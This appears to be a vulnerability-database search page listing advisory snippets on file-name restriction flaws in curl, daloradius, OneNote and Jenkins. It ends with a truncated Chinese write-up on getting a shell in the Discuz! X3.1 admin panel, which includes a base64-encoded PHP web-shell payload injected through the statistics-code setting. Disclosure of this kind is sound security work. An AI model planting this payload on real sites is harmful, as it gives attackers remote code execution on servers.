9 matches found
Astra Linux – Vulnerability in curl
Curl versions 7.20.0 through 7.70.0 are vulnerable to improper restrictions on the names of files and other resources, which can lead to overwriting of local files when the -J flag is used...
EUVD-2022-4893
Malicious code in bioql PyPI...
CVE-2023-0046
Improper Restriction of Names for Files and Other Resources in GitHub repository lirantal/daloradius prior to master-branch...
PT-2025-1292
Name of the Vulnerable Software and Affected Versions Microsoft Office OneNote affected versions not specified Description The issue is related to incorrect restriction of file names and other resources in Microsoft Office OneNote. This can allow an attacker to execute arbitrary code...
CVE-2023-0046
CVE-2023-0046 relates to the daloradius project: prior to the master-branch, there is an issue with improper restriction of names for files and other resources due to lack of filename restrictions when saving logging data. An attacker can manipulate the logging filename to point to an existing PH...
Jenkins LTS < 2.319.2 / Jenkins weekly < 2.330 Multiple Vulnerabilities
According to its its self-reported version number, the version of Jenkins running on the remote web server is Jenkins LTS prior to 2.319.2 or Jenkins weekly prior to 2.330. It is, therefore, affected by multiple vulnerabilities: - A cross-site request forgery CSRF vulnerability in Jenkins 2.329 a...
curl 7.20.0 through 7.70.0 is vulnerable to improper restriction of names for files and other resources that can lead too overwriting a local file when the -J flag is used.
...
CVE-2020-8177
CVE-2020-8177 affects curl up to 7.70.0, where -J/--remote-header-name combined with -i/--include could allow a malicious server to overwrite a local file due to improper restriction of file names. Connected advisories confirm this vulnerability across distributions (Debian, CentOS, Alpine, Amazo...
Discuz! X3.1 Release 20140301后台拿shell真的修复了吗
简要描述: 之前写的几个后台拿shell,Discuz!忽略了,但新版本Discuz! X3.1 Release 20140301实际上有所加强,但是真的修复了之前提到的问题吗? Discuz!大概做了下面几个改动: 1.统计代码处,对 "和 "" 的被转意了,那就用 ,经过测试,尖括号未被转意。 下面来重现过程: 1.先上传一张版本图: 2. 全局-站点信息-网站第三方统计代码, 里面插入我们要执行的php代码,如下: fputsfopen't.php',w,base64decode"PD9waHAgQGV2YWwoJF9QT1NUW2NdKTs/Pg=="; 3.工具 - 更新缓存,...